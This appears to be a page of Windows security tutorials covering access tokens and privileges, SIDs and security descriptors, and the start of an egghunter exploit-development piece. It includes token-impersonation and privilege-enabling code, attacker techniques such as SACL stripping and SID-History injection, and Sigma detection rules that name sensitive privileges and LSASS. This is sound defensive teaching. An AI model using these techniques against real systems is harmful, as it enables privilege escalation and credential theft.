Access Tokens and Privileges: The Kernel’s Security Context

Run whoami /priv on an admin shell. You’ll see a column labeled State, and most of the entries — including SeDebugPrivilege and SeImpersonatePrivilege — read Disabled. They aren’t missing. They’re sitting in the token, dormant, waiting for a BOOL flip. That single column is the entire story of most Windows post-exploitation tradecraft in one place: not forging anything, just enabling what was already issued.

Objective: Understand how Windows builds and enforces a per-process security context through the access token, how the Security Reference Monitor uses that token on every object access, and which token operations defenders need to see to catch impersonation, theft, and privilege enablement.


1. Why Tokens Exist

When you authenticate, LSASS (lsass.exe) creates a logon session, derives a primary access token from that session, and hands it to whatever process is being started for you — userinit.exe, then explorer.exe. From that point forward, every kernel object you touch — files, registry keys, named pipes, processes, threads — is evaluated against that token by the Security Reference Monitor (SRM).

The SRM lives in the kernel and does one job: when a thread asks for access to an object, compare the thread’s effective token to the object’s security descriptor and return a yes/no. That comparison happens in SeAccessCheck (kernel) and is surfaced to user mode as AccessCheck. The order matters — Integrity Level check → DACL check → Privilege check.

Without a token, the kernel has no answer to “who is this thread, and what is it allowed to do?” Tokens aren’t a wrapper around credentials. They are the runtime identity.

Flow diagram showing LSASS authentication creating a logon session, deriving a primary token, attaching it to a process, and the Security Reference Monitor performing SeAccessCheck in order: Integrity Level, DACL, Privilege.
From authentication to access decision: the primary token is the runtime identity the SRM consults on every object request.

2. Inside nt!_TOKEN

The kernel object is nt!_TOKEN. It’s undocumented — Microsoft exposes Win32 wrappers, not field layouts — but you can inspect it on your own build:

0: kd> dt nt!_TOKEN

The layout shifts between Windows versions, so never hardcode offsets. The fields that matter conceptually are stable:

FieldPurpose
TokenIdLUID uniquely identifying this token instance
AuthenticationIdLUID of the originating logon session
TokenTypeTokenPrimary (1) or TokenImpersonation (2)
ImpersonationLevelOnly meaningful for impersonation tokens
UserAndGroupsArray of SID_AND_ATTRIBUTES — user SID plus group SIDs
PrivilegesSEP_TOKEN_PRIVILEGES — three 64-bit privilege bitmasks
IntegrityLevelIndexIndex into UserAndGroups pointing at the mandatory label
LogonSessionPointer to SEP_LOGON_SESSION_REFERENCES
DefaultDaclDACL applied to objects this token creates
SessionIdRDP / Terminal Services session ID

The Privileges member is worth dwelling on. SEP_TOKEN_PRIVILEGES carries three 64-bit bitmasks — Present, Enabled, and EnabledByDefault — and that three-state design is the entire reason “privilege escalation” can be a one-API-call affair (covered in §6). This layout is community-observed via WinDbg and ReactOS source; treat it as undocumented and verify on your target build.

Hierarchy diagram of the nt!_TOKEN kernel structure, branching into Identity fields, Type and Impersonation Level, UserAndGroups SID array, SEP_TOKEN_PRIVILEGES with three bitmasks, Integrity Level index, and Logon Session pointer.
The nt!_TOKEN structure: the three-bitmask SEP_TOKEN_PRIVILEGES field (Present, Enabled, EnabledByDefault) is the mechanism behind most privilege-escalation tradecraft.

3. Primary vs. Impersonation Tokens

Every process has exactly one primary token, set at CreateProcess time and fixed for the lifetime of the process. You don’t swap it. To run code under a different identity, you start a new process with a different token (CreateProcessAsUser, CreateProcessWithTokenW).

Threads are different. A thread can carry an impersonation token that temporarily overrides the process’s primary token for that thread only. This is how RPC servers, named-pipe servers, and IIS worker threads handle requests on behalf of multiple callers without spawning a process each time. The kernel keeps it in _KTHREAD.ImpersonationInfo; SeAccessCheck prefers the thread token over the process token if one is present.

The distinction matters at detection time too. OpenProcessToken returns the primary token; OpenThreadToken returns the impersonation token, if any. A thread calling OpenThreadToken and getting ERROR_NO_TOKEN is normal — most threads aren’t impersonating. A thread calling it and getting SYSTEM is not.

Graph diagram contrasting a process primary token stored in _EPROCESS with a per-thread impersonation token stored in _KTHREAD.ImpersonationInfo, showing the SRM preferring the thread token when present.
The SRM always prefers a thread’s impersonation token over the process primary token, making per-thread identity the key primitive for RPC and pipe servers.

4. Integrity Levels and Mandatory Integrity Control

Mandatory Integrity Control (MIC) added a sideband label to the token and a corresponding mandatory label ACE in object SACLs. Five well-known integrity SIDs cover the practical range:

SIDLevelTypical Use
S-1-16-0UntrustedHeavily sandboxed code
S-1-16-4096LowBrowser renderers, AppContainer
S-1-16-8192MediumDefault for interactive user processes
S-1-16-12288HighElevated (post-UAC) admin processes
S-1-16-16384SystemSYSTEM-account services and kernel components

The label sits in UserAndGroups at index IntegrityLevelIndex, retrievable from user mode via GetTokenInformation(..., TokenIntegrityLevel, ...) into a TOKEN_MANDATORY_LABEL. MIC’s enforcement rule is simple: a process at a lower integrity level cannot write to or modify a higher-integrity object belonging to the same user — no DLL injection, no token impersonation up the chain. That single rule is what stops a Medium-IL Word process from injecting into a High-IL elevated PowerShell.

5. Reading a Token from User Mode

The minimum useful query: open the token, ask for the user SID, print it.

HANDLE hToken = NULL;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
    return GetLastError();
}

DWORD cbUser = 0;
GetTokenInformation(hToken, TokenUser, NULL, 0, &cbUser);
PTOKEN_USER pUser = (PTOKEN_USER)LocalAlloc(LPTR, cbUser);

if (GetTokenInformation(hToken, TokenUser, pUser, cbUser, &cbUser)) {
    LPWSTR sidStr = NULL;
    ConvertSidToStringSidW(pUser->User.Sid, &sidStr);
    wprintf(L"User SID: %s\n", sidStr);
    LocalFree(sidStr);
}

LocalFree(pUser);
CloseHandle(hToken);

The same GetTokenInformation call with TokenGroups returns a TOKEN_GROUPS you can walk to see which groups are SE_GROUP_ENABLED, SE_GROUP_MANDATORY, or SE_GROUP_INTEGRITY (that last flag is how you find the IL label without parsing the index). TokenPrivileges returns a TOKEN_PRIVILEGES and feeds the next section.

For integrity level specifically:

DWORD cb = 0;
GetTokenInformation(hToken, TokenIntegrityLevel, NULL, 0, &cb);
PTOKEN_MANDATORY_LABEL pLabel = (PTOKEN_MANDATORY_LABEL)LocalAlloc(LPTR, cb);
GetTokenInformation(hToken, TokenIntegrityLevel, pLabel, cb, &cb);

DWORD rid = *GetSidSubAuthority(
    pLabel->Label.Sid,
    (DWORD)(UCHAR)(*GetSidSubAuthorityCount(pLabel->Label.Sid) - 1));

// rid == 0x2000 (8192)  -> Medium
// rid == 0x3000 (12288) -> High
// rid == 0x4000 (16384) -> System

6. Privileges: Present, Enabled, Removed

A privilege has three independent states inside the token:

  • Present — the privilege exists in the token. Cannot be added at runtime by user mode.
  • Enabled — the privilege is currently active for access checks.
  • Removed — once a privilege is removed via SE_PRIVILEGE_REMOVED, it’s gone for the life of the token.

AdjustTokenPrivileges only moves a privilege between “present and disabled” and “present and enabled.” It cannot grant a privilege the token never had. So when a tool “enables SeDebugPrivilege,” it isn’t gaining authority — that authority was issued at logon and waiting in the Present bitmask. The enable is purely a flag flip.

HANDLE hToken;
LUID  luid;
TOKEN_PRIVILEGES tp = {0};

OpenProcessToken(GetCurrentProcess(),
                 TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
                 &hToken);

LookupPrivilegeValueW(NULL, SE_DEBUG_NAME, &luid);

tp.PrivilegeCount           = 1;
tp.Privileges[0].Luid       = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);

if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
    // Privilege wasn't Present in the token -> not actually enabled.
}

That ERROR_NOT_ALL_ASSIGNED check is the gotcha most first-timers miss: AdjustTokenPrivileges returns TRUE even when the privilege isn’t in Present. The real outcome is only visible through GetLastError. I’ve burned a solid afternoon staring at a “successful” call that did nothing because the calling process was unelevated and SeDebugPrivilege was never issued in the first place.

The privileges worth keeping at the top of a defender’s list:

PrivilegeWhy It Matters
SeDebugPrivilegeOpen any process, including LSASS, for read/write
SeImpersonatePrivilegePrecondition for the Potato family of escalations
SeAssignPrimaryTokenPrivilegeReplace a process’s primary token
SeTcbPrivilege“Act as part of the OS” — essentially unrestricted
SeLoadDriverPrivilegeLoad arbitrary kernel drivers → BYOVD
SeBackupPrivilege / SeRestorePrivilegeRead/write any file regardless of DACL
SeTakeOwnershipPrivilegeSeize ownership of any object
SeCreateTokenPrivilegeForge tokens directly — held only by SYSTEM

7. Impersonation in Depth

SECURITY_IMPERSONATION_LEVEL defines how far the impersonating thread can act on behalf of the original principal:

LevelMeaning
SecurityAnonymousServer cannot identify or impersonate the client
SecurityIdentificationServer can identify but not act as the client
SecurityImpersonationServer can act as the client on the local machine
SecurityDelegationServer can act as the client on local and remote systems

The canonical sequence for a service impersonating a caller:

HANDLE hClient;
DuplicateTokenEx(hSourceToken,
                 TOKEN_ALL_ACCESS,
                 NULL,
                 SecurityImpersonation,
                 TokenImpersonation,
                 &hClient);

SetThreadToken(NULL, hClient);   // current thread now runs as the client
// ... perform the work that requires the client's identity ...
RevertToSelf();                  // back to the process's primary token
CloseHandle(hClient);

SECURITY_QUALITY_OF_SERVICE controls whether impersonation tracks the source statically or dynamically, and whether only the enabled privileges follow (EffectiveOnly). That last flag is one of the more interesting defensive levers — a service calling impersonation with EffectiveOnly = TRUE strips dormant privileges out of the impersonation context entirely.

8. Duplication, LogonUser, and Process Creation Under a Token

Three primitives cover most of the “run something as someone else” surface:

  • DuplicateTokenEx — clone an existing token, optionally upgrading from impersonation to primary type. Requires TOKEN_DUPLICATE on the source.
  • LogonUser — authenticate a username/password and receive a fresh primary token tied to a new logon session.
  • CreateProcessWithTokenW — start a new process whose primary token is the one you pass in. Requires SeImpersonatePrivilege on the caller.

The MITRE taxonomy splits the abuse cleanly along these primitives:

  • T1134.001 — Token Impersonation/Theft. OpenProcessToken against a higher-privileged process, DuplicateTokenEx, then ImpersonateLoggedOnUser or SetThreadToken. No credentials needed; you steal what’s already running.
  • T1134.002 — Create Process with Token. Same theft, but you go straight to CreateProcessWithTokenW to start a new process under the stolen identity rather than impersonating on a thread.
  • T1134.003 — Make and Impersonate Token. LogonUser with credentials in hand, then SetThreadToken. Quieter than theft because the resulting logon looks legitimate — but it generates a 4624 you can see.
Flow diagram mapping token abuse primitives: OpenProcessToken feeding DuplicateTokenEx which branches to thread impersonation (T1134.001) or CreateProcessWithTokenW (T1134.002), and LogonUser feeding SetThreadToken (T1134.003).
The three MITRE T1134 sub-techniques map directly onto three token API primitives — theft via duplication, new process under stolen token, or fresh token from explicit credentials.

9. _EPROCESS.Token and Kernel-Mode Abuse

The kernel’s view of a process’s primary token is the Token field in _EPROCESS, an EX_FAST_REF — a pointer with reference-count bits packed into the low bits. A kernel exploit with arbitrary write can overwrite that field with a pointer to the SYSTEM process’s token, instantly upgrading the attacker’s process to SYSTEM without touching any user-mode API.

Walking it in WinDbg looks like this:

0: kd> !process 0 0 explorer.exe
PROCESS ffffba0c1a5f6080 ...
0: kd> dt nt!_EPROCESS ffffba0c1a5f6080 Token
   +0x4b8 Token : _EX_FAST_REF
0: kd> dt nt!_TOKEN (poi(ffffba0c1a5f6080+0x4b8) & ~0xf)

The offset will not be 0x4b8 on your build. Use dt to find it on the system you’re analyzing.

For defenders, the operational takeaway is that kernel-mode token swapping leaves no user-mode footprint — no AdjustTokenPrivileges, no OpenProcessToken, no 4703. The detection has to shift earlier: catch the driver load (SeLoadDriverPrivilege use, signed-driver loader events) or the exploit’s user-mode loader, because by the time the swap happens your audit pipeline is blind to it.


10. Detection and Defense

Token abuse leaves observable traces across the Security log, Sysmon, and ETW. Pick the events that match the primitive you’re hunting.

Windows Security Audit Events

Event IDNameWhat It Tells You
4624Successful logonNew logon session and primary token; check LogonType
4648Logon with explicit credentialsrunas, CreateProcessWithLogonW, lateral movement
4672Special privileges assigned to new logonSensitive privileges granted at session start
4673Privileged service calledUse of sensitive privilege
4688New process createdIncludes TokenElevationType (1/2/3)
4703User right adjustedAdjustTokenPrivileges calls — the core privilege-enable signal

4672 is high-value: it fires once per privileged logon and lists the sensitive privileges assigned. Filter out the well-known principals (LOCAL SYSTEM, NETWORK SERVICE, LOCAL SERVICE) and expected admins. What’s left is worth a look — that’s where Mimikatz-style pass-the-hash and elevation activity surfaces.

Sysmon

  • EID 1 (Process Create)IntegrityLevel and User fields directly show the process’s effective token. A child of a Medium-IL process suddenly running at System integrity is a hard signal.
  • EID 10 (ProcessAccess)OpenProcess against LSASS or other high-value targets. Watch GrantedAccess masks like 0x1400 (PROCESS_QUERY_INFORMATION | PROCESS_QUERY_LIMITED_INFORMATION) and 0x40 (PROCESS_DUP_HANDLE).
  • EID 8 (CreateRemoteThread) — cross-process injection that frequently follows token theft.

Sigma Sketch: Privilege Enable on a Sensitive Right

title: Sensitive Privilege Adjusted via AdjustTokenPrivileges
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4703
    EnabledPrivilegeList|contains:
      - 'SeDebugPrivilege'
      - 'SeImpersonatePrivilege'
      - 'SeTcbPrivilege'
      - 'SeLoadDriverPrivilege'
  filter_known:
    SubjectUserSid:
      - 'S-1-5-18'   # LOCAL SYSTEM
      - 'S-1-5-19'   # LOCAL SERVICE
      - 'S-1-5-20'   # NETWORK SERVICE
  condition: selection and not filter_known
level: high

To produce 4703, the Audit Token Right Adjusted subcategory has to be enabled — it isn’t by default on most builds. Same goes for Audit Sensitive Privilege Use for 4673/4674, and command-line logging in 4688 (Group Policy: System → Audit Process Creation → Include command line).

ETW Providers

ProviderWhat It Carries
Microsoft-Windows-Security-AuditingAll audit events above
Microsoft-Windows-Kernel-ProcessProcess/thread lifecycle including token assignment
Microsoft-Windows-Threat-IntelligenceHigh-fidelity process-access telemetry; PPL consumer only (Defender/EDR)

Hardening

  • SeCreateTokenPrivilege → SYSTEM only. Nothing else needs it.
  • SeAssignPrimaryTokenPrivilege → local/network service accounts only. Audit anything else holding it.
  • Strip SeImpersonatePrivilege from service accounts that don’t host RPC or named-pipe endpoints. Its presence is the precondition for the Potato family.
  • PPL for critical services — blocks OpenProcess with token-access rights from unprotected callers.
  • Credential Guard — isolates logon-session secrets in VSM,

Related Tutorials

References

SIDs and Security Descriptors: Identity in Windows Security

A thread opens a handle to a file. Before a single byte is read, the kernel has already answered a question nobody typed: is the caller’s identity allowed to do this? That answer lives at the intersection of two structures — the SID that names who you are, and the security descriptor that says who gets in. Get the relationship between them wrong and you ship a world-writable service. Understand it, and most “weird permission” incidents stop being mysterious.

Objective: Understand how Windows represents identity with Security Identifiers, how Security Descriptors bind owners, DACLs, and SACLs to every securable object, and how attackers abuse — and defenders detect — manipulation of both.


1. Identity Before Access

Windows authenticates security principals — anything the OS can prove an identity for: users, groups, computers, and service accounts. Authentication is the LSA’s job; the SAM (local) or the domain’s NTDS.dit (Active Directory) stores the account records. But authentication only proves who you are. Authorization — what you may touch — is a separate decision made against a different value: the SID.

A SID is the canonical, machine-readable name for a principal. Display names change. SAM account names get reused. SIDs do not. Once the system mints a SID at account-creation time, that value is never reused to identify another principal, even after the account is deleted. Every authorization check in the OS compares SIDs, never names.


2. Anatomy of a SID

A SID is a variable-length binary structure, defined as SID in winnt.h. Three logical parts: a revision, the issuing authority, and a chain of sub-authorities ending in a Relative Identifier (RID).

FieldTypeMeaning
RevisionBYTESID structure version — always 1
SubAuthorityCountBYTENumber of sub-authority values (max 15)
IdentifierAuthoritySID_IDENTIFIER_AUTHORITY6-byte top-level authority that issued the SID
SubAuthority[]DWORD[]Sub-authority values; the last element is the RID

The string notation everyone recognizes is just those fields, hyphenated. Take S-1-5-21-<d1>-<d2>-<d3>-513:

  • S-1 — a revision-1 SID.
  • 5SECURITY_NT_AUTHORITY, marking it a Windows NT SID.
  • 21SECURITY_NT_NON_UNIQUE, signaling that a domain identifier follows.
  • <d1>-<d2>-<d3> — three 32-bit values randomly generated to uniquely identify the domain.
  • 513 — the RID; here, the well-known RID for Domain Users.

You rarely build SIDs by hand. You parse them. Here’s the field-level walk in C — note that the documented accessors (GetSidSubAuthority, GetSidIdentifierAuthority) return pointers into the structure, which trips up everyone the first time:

#include <windows.h>
#include <sddl.h>
#include <stdio.h>

void PrintSid(PSID pSid) {
    if (!IsValidSid(pSid)) return;

    PSID_IDENTIFIER_AUTHORITY pAuth = GetSidIdentifierAuthority(pSid);
    DWORD subCount = *GetSidSubAuthorityCount(pSid);

    printf("Authority: %u\n", (DWORD)pAuth->Value[5]); // NT authority lives in the low byte
    for (DWORD i = 0; i < subCount; i++)
        printf("  SubAuthority[%lu] = %lu\n", i, *GetSidSubAuthority(pSid, i));

    LPSTR str = NULL;
    if (ConvertSidToStringSidA(pSid, &str)) {       // -> "S-1-5-..."
        printf("String SID: %s\n", str);
        LocalFree(str);
    }
}

To go the other direction — constructing a known SID — use AllocateAndInitializeSid, which takes an authority plus up to eight sub-authorities. Building the SYSTEM SID (S-1-5-18) and comparing it with EqualSid is the idiomatic way to check “am I running as LocalSystem?”:

SID_IDENTIFIER_AUTHORITY ntAuth = SECURITY_NT_AUTHORITY; // {0,0,0,0,0,5}
PSID pSystem = NULL;

if (AllocateAndInitializeSid(&ntAuth, 1,
        SECURITY_LOCAL_SYSTEM_RID,   // 18
        0, 0, 0, 0, 0, 0, 0, &pSystem)) {
    // EqualSid(tokenSid, pSystem) -> TRUE means LocalSystem
    FreeSid(pSystem);                // never free this with LocalFree
}

3. Well-Known SIDs and Built-in Principals

Some SIDs are identical on every Windows install. Hard-coding their strings is a bug waiting to happen across locales and versions; use the documented constants where you can. Memorize the ones below anyway — you’ll read them in logs daily.

SIDPrincipal
S-1-0-0Null SID (a group with no members)
S-1-1-0Everyone
S-1-5-18Local System
S-1-5-19Local Service
S-1-5-20Network Service
S-1-5-32-544Builtin\Administrators
S-1-16-12288High mandatory integrity level

Built-in accounts also carry well-known RIDs appended to the domain or machine SID: 500 is Administrator, 501 is Guest, 512 is Domain Admins. An attacker enumerating a domain looks for RID 500 and 512 specifically — the display name can be renamed, the RID cannot. Capability SIDs the OS recognizes are cached under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SecurityManager\CapabilityClasses\AllCachedCapabilities.


4. SIDs at Runtime: The Access Token

When a user signs in, LSA builds an access token for the session. That token is the runtime bag of identity: the user’s SID, the SIDs of every group the user belongs to, the privileges granted, and a mandatory integrity level SID (the S-1-16-* family). Every process started in that logon context inherits a copy. When code makes an access check, the kernel compares the SIDs in the token against the SIDs in the object’s DACL.

One detail that becomes an attack surface later: an account can carry extra SIDs in its Active Directory sIDHistory attribute. That attribute exists for legitimate domain migration — copy the old SID into sIDHistory so a migrated user keeps access to resources permissioned to the old account without re-ACLing everything. The catch is that all values in sIDHistory are injected into the access token at logon, exactly as if they were primary group memberships.


Flowchart showing how LSA mints an access token at logon, the token is inherited by processes, and the Security Reference Monitor compares token SIDs against an object DACL to produce a granted access mask
Every handle open flows through SeAccessCheck, which compares the caller’s token SIDs against the target object’s DACL top-to-bottom before returning a granted-access mask.

5. The Security Descriptor: Structure and Fields

Every object the Object Manager creates has a security descriptor. The structure is SECURITY_DESCRIPTOR, reproduced here verbatim from winnt.h:

typedef struct _SECURITY_DESCRIPTOR {
  BYTE                        Revision;
  BYTE                        Sbz1;
  SECURITY_DESCRIPTOR_CONTROL Control;
  PSID                        Owner;
  PSID                        Group;
  PACL                        Sacl;
  PACL                        Dacl;
} SECURITY_DESCRIPTOR, *PISECURITY_DESCRIPTOR;

Field by field: Revision is always 1; Sbz1 is reserved and must be zero; Control is a flag bitmask; Owner and Group point to SIDs; Dacl and Sacl point to access-control lists. The internal layout differs between absolute form (the struct holds pointers to separately allocated SIDs and ACLs) and self-relative form (everything packed into one contiguous blob with offsets, marked by SE_SELF_RELATIVE). Because that format varies, never poke fields directly — drive it through the API.

The Control field qualifies how the rest of the descriptor is interpreted:

FlagMeaning
SE_DACL_PRESENTThe descriptor has a DACL (the pointer may still be NULL)
SE_SACL_PRESENTThe descriptor has a SACL
SE_DACL_PROTECTEDDACL is shielded from inherited ACEs
SE_SACL_PROTECTEDSACL is shielded from inherited ACEs
SE_OWNER_DEFAULTEDOwner was assigned by a default mechanism
SE_SELF_RELATIVEDescriptor is in packed, self-relative form

Here is the single most important gotcha in this entire topic, and it has burned production systems repeatedly. There is a difference between no DACL, an empty DACL, and a NULL DACL:

SECURITY_DESCRIPTOR sd;
InitializeSecurityDescriptor(&sd, SECURITY_DESCRIPTOR_REVISION);

// NULL DACL: present == TRUE, pointer == NULL  -> GRANTS EVERYONE FULL ACCESS
SetSecurityDescriptorDacl(&sd, TRUE, NULL, FALSE);

// Empty DACL: present == TRUE, non-NULL ACL with zero ACEs -> DENIES EVERYONE
// (initialize an ACL with InitializeAcl and add no ACEs, then pass it here)

If SE_DACL_PRESENT is not set, or it is set with a NULL DACL pointer, the object allows full access to everyone. Developers reach for SetSecurityDescriptorDacl(&sd, TRUE, NULL, FALSE) thinking “no restrictions, default behavior” and ship a world-writable named pipe or service. An empty DACL — present, non-NULL, zero ACEs — does the opposite and denies everyone. One null pointer is the difference.


Hierarchy diagram of the SECURITY_DESCRIPTOR structure showing Owner SID, Group SID, DACL containing allow and deny ACEs, and SACL containing audit ACEs as child nodes
A security descriptor owns four pointers: two SIDs declaring ownership, a DACL controlling access, and a SACL controlling auditing — each ACE carries its own SID and access mask.

6. DACLs and ACEs: How Access Is Decided

A DACL is an ordered list of Access Control Entries. Each ACE has an ACE_HEADER (AceType, AceFlags, AceSize), an ACCESS_MASK of rights, and a trailing SID the entry applies to.

ACE TypeUsed InEffect
ACCESS_ALLOWED_ACEDACLGrants rights in its mask to the SID
ACCESS_DENIED_ACEDACLDenies rights in its mask to the SID
SYSTEM_AUDIT_ACESACLLogs access matching its mask

Evaluation order matters: the kernel walks ACEs top to bottom and stops as soon as the requested access is fully granted or any of it is denied. Well-formed (canonical) DACLs place deny ACEs ahead of allow ACEs precisely so a deny is seen first. An ACL has no hard ACE-count limit, but the whole ACL must stay under 64 KB.

Reading a real object’s DACL means pulling the descriptor and iterating ACEs by index with GetAce:

PSECURITY_DESCRIPTOR pSD = NULL;
PSID  pOwner = NULL;
PACL  pDacl  = NULL;

DWORD rc = GetNamedSecurityInfoW(
    L"C:\\Windows\\System32\\config\\SAM", SE_FILE_OBJECT,
    OWNER_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION,
    &pOwner, NULL, &pDacl, NULL, &pSD);

if (rc == ERROR_SUCCESS && pDacl) {
    for (WORD i = 0; i < pDacl->AceCount; i++) {
        PACE_HEADER hdr = NULL;
        if (GetAce(pDacl, i, (LPVOID*)&hdr)) {
            // hdr->AceType  == ACCESS_ALLOWED_ACE_TYPE / ACCESS_DENIED_ACE_TYPE
            // hdr->AceFlags == CONTAINER_INHERIT_ACE | OBJECT_INHERIT_ACE | ...
        }
    }
    LocalFree(pSD);
}

7. SACLs: Auditing Through the System ACL

The SACL uses the same ACL container but holds SYSTEM_AUDIT_ACE entries instead. Its access mask doesn’t grant or deny anything — it defines which access attempts generate audit records in the Windows Security Event Log. Reading or writing any object’s SACL requires the SeSecurityPrivilege right, which only Administrators normally hold. That privilege boundary is exactly why SACL tampering is a high-value detection target: the act of stripping audit ACEs is itself privileged.


8. SDDL: Security Descriptors as Text

A binary descriptor is awful to log, diff, or paste into a config file, so Windows defines the Security Descriptor Definition Language — a string form. The grammar is O: owner, G: group, D: DACL, S: SACL, each followed by flags and parenthesized ACEs:

O:BAG:SYD:(A;;FA;;;SY)(A;;FA;;;BA)(A;;0x1200a9;;;BU)S:(AU;SAFA;FA;;;WD)

That single ACE (A;;GRGWGX;;;SY) reads as: Allow, no inherit flags, Generic Read/Write/eXecute, to SY (SYSTEM). Round-trip it with ConvertSecurityDescriptorToStringSecurityDescriptor and ConvertStringSecurityDescriptorToSecurityDescriptor. In practice you’ll read SDDL far more often through PowerShell:

$acl = Get-Acl C:\Windows\System32\config\SAM
$acl.Owner            # owner principal
$acl.Sddl             # full SDDL string
$acl.Access | Format-Table IdentityReference, FileSystemRights, AccessControlType

icacls <path> gives the same data in a terser shorthand; Get-Acl is friendlier when you want the SDDL string itself for a baseline diff.


9. Inheritance and the Kernel Check

Child objects don’t usually carry hand-written ACLs. They inherit them. An ACE’s flags decide propagation: OBJECT_INHERIT_ACE (OI) pushes it onto leaf objects like files, CONTAINER_INHERIT_ACE (CI) onto sub-containers like folders or registry subkeys, and INHERIT_ONLY_ACE (IO) makes an ACE apply only to children and not the object carrying it. SE_DACL_PROTECTED blocks inheritance entirely — that’s what “disable inheritance” does in Explorer.

The decision itself happens in the kernel. Each OBJECT_HEADER carries a SecurityDescriptor field. At handle-creation time the Object Manager hands the token, the requested access, and the descriptor to the Security Reference Monitor (nt!SeAccessCheck), which walks the DACL and returns a granted-access mask. You can see the whole chain live in WinDbg:

kd> !process 0 0 lsass.exe
kd> !object <Object address>
kd> dt nt!_OBJECT_HEADER <header address> SecurityDescriptor
kd> !sd <SecurityDescriptor address & ~0xf>   ; mask low bits, they're flags
kd> !token                                     ; the token the check runs against

Files, registry keys, processes, threads, named pipes, services, jobs — anything named and securable runs through this same path.


10. Common Attacker Techniques

SIDs and SDs aren’t just plumbing — they’re a manipulation target for evasion and escalation. The primitives below all leave traces (covered next), which is the point of teaching them.

TechniqueDescription
NULL DACL plantingSet a present-but-NULL DACL on a service, registry key, or pipe to make it world-writable
DACL tampering for persistenceAdd an explicit ACCESS_ALLOWED_ACE granting the attacker’s SID FullControl on a sensitive object
Owner abuseTaking ownership of an object implicitly grants WRITE_DAC, letting an attacker rewrite the DACL afterward
SID-History injectionWrite a privileged SID (e.g. a Domain Admins RID) into a controlled account’s sIDHistory so it lands in the token
SACL strippingRemove audit ACEs from lsass.exe, SAM, or ntds.dit to suppress access logging before credential theft
Permission group discoveryEnumerate group SIDs and ACL members to plan lateral movement

A populated sIDHistory on a non-migrated account is the canonical hunting signal for the injection case:

Get-ADUser -Filter * -Properties sIDHistory |
    Where-Object { $_.sIDHistory } |
    Select-Object Name, @{ n='sIDHistory'; e={ $_.sIDHistory -join ', ' } }

In a domain with no active migration, any result here deserves investigation — especially a sIDHistory value ending in RID 512 or 519.


Graph diagram mapping four attacker techniques — SID-History Injection, NULL DACL Planting, DACL Tampering, and SACL Stripping — to their respective impacts: privileged token, world-writable object, persistent access, and audit blindspot
Each abuse primitive targets a distinct part of the SID/security-descriptor model and produces a different attacker capability, from silent credential theft to persistent object access.

11. Detection, Hunting, and Hardening

DACL and SACL changes are logged by Windows itself, not Sysmon — you must enable the right Advanced Audit Policy subcategories first (Object Access → Audit File System / Audit Registry, and Policy Change → Audit Audit Policy Change).

Event IDTriggerHunt On
4670Object permissions changed (DACL/Owner)ObjectName, OldSd, NewSd, SubjectUserSid
4907Object auditing (SACL) settings changedBlank NewSd = SACL stripped
4715Audit policy on an object changedOriginalSecurityDescriptor, NewSecurityDescriptor
4719System audit policy changedSubjectUserSid, AuditPolicyChanges
4663Object access attemptSudden gaps after a 4907 on LSASS = stripping
4728/4732/4756Member added to privileged groupCorrelate with SID manipulation

The highest-fidelity signal is a 4907 that blanks the SACL on lsass.exe, ntds.dit, or the SAM hive — that’s pre-credential-dump preparation. Pair it with Sysmon Event ID 10 (process access to LSASS) and Event ID 1 watching for icacls.exe, cacls.exe, sc.exe sdset, and Set-Acl command lines. A Sigma sketch for DACL tampering on sensitive objects:

title: Suspicious DACL Modification on Sensitive Object
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4670
    ObjectName|contains:
      - '\lsass.exe'
      - '\ntds.dit'
      - '\SAM'
  condition: selection
fields:
  - SubjectUserSid
  - ObjectName
  - OldSd
  - NewSd
level: high

Hardening, in rough priority order:

  • Hunt NULL DACLs. Use AccessChk to enumerate world-writable services, keys, and files; fix them.
  • Protect the LSASS SACL and alert on any 4907 that empties it.
  • Enable SID Filtering on every trust to neutralize cross-domain sIDHistory abuse, and audit sIDHistory on a schedule.
  • Restrict SeSecurityPrivilege to Administrators and watch for its use.
  • Prefer explicit DENY over absent ALLOW, and put privileged accounts in Protected Users.

MITRE ATT&CK Mapping

TechniqueMITRE IDDetection
Access Token ManipulationT1134Token/SID anomalies in logon events
SID-History InjectionT1134.005Non-empty sIDHistory on non-migrated accounts
File/Directory Permissions ModificationT1222.0014670; icacls/SetNamedSecurityInfo in 4688
Impair Defenses: Disable/Modify ToolsT1562.0014907 blanking a SACL; 4663 gaps
Permission Groups DiscoveryT1069.001 / .002Bulk SID/group enumeration

12. Tools

ToolDescriptionLink
AccessChkDumps effective permissions and finds NULL/weak DACLslearn.microsoft.com
icaclsBuilt-in ACL viewer/editor with SDDL shorthand(built-in)
Get-Acl / Set-AclPowerShell SD read/write, exposes .Sddl(built-in)
WinDbgKernel-side !sd, !token, OBJECT_HEADER inspectionlearn.microsoft.com
Process HackerGUI view of token SIDs and object securityprocesshacker.sourceforge.io
WinObjBrowse Object Manager namespace and per-object securitylearn.microsoft.com

Summary

  • A SID is the immutable, never-reused name Windows checks for every authorization decision — display names are cosmetic, SIDs are ground truth.
  • The access token carries the user SID plus all group SIDs (including any from sIDHistory), and the kernel compares those against an object’s DACL via nt!SeAccessCheck.
  • The SECURITY_DESCRIPTOR binds owner, group, DACL, and SACL; a present-but-NULL DACL silently grants everyone full access, while an empty DACL denies everyone.
  • SID-History injection (T1134.005) and SACL stripping (T1562.001) are the two abuse primitives worth hunting hardest — watch 4670, 4907, and non-empty sIDHistory.
  • Enable Object Access and Policy Change auditing, restrict SeSecurityPrivilege, enable SID Filtering on trusts, and baseline SDDL on sensitive objects so a tampered DACL stands out.

Related Tutorials

References

Egghunters: Staged Payload Delivery When Buffer Space Is Tight

You’ve overwritten the SEH chain. The POP POP RET gadget drops you into a clean four-byte landing zone, the short jump carries you forward — and you count maybe 60 usable bytes before the buffer turns to garbage. Your stager is 350. That gap, between the space you control and the space your payload needs, is the entire reason egghunters exist.

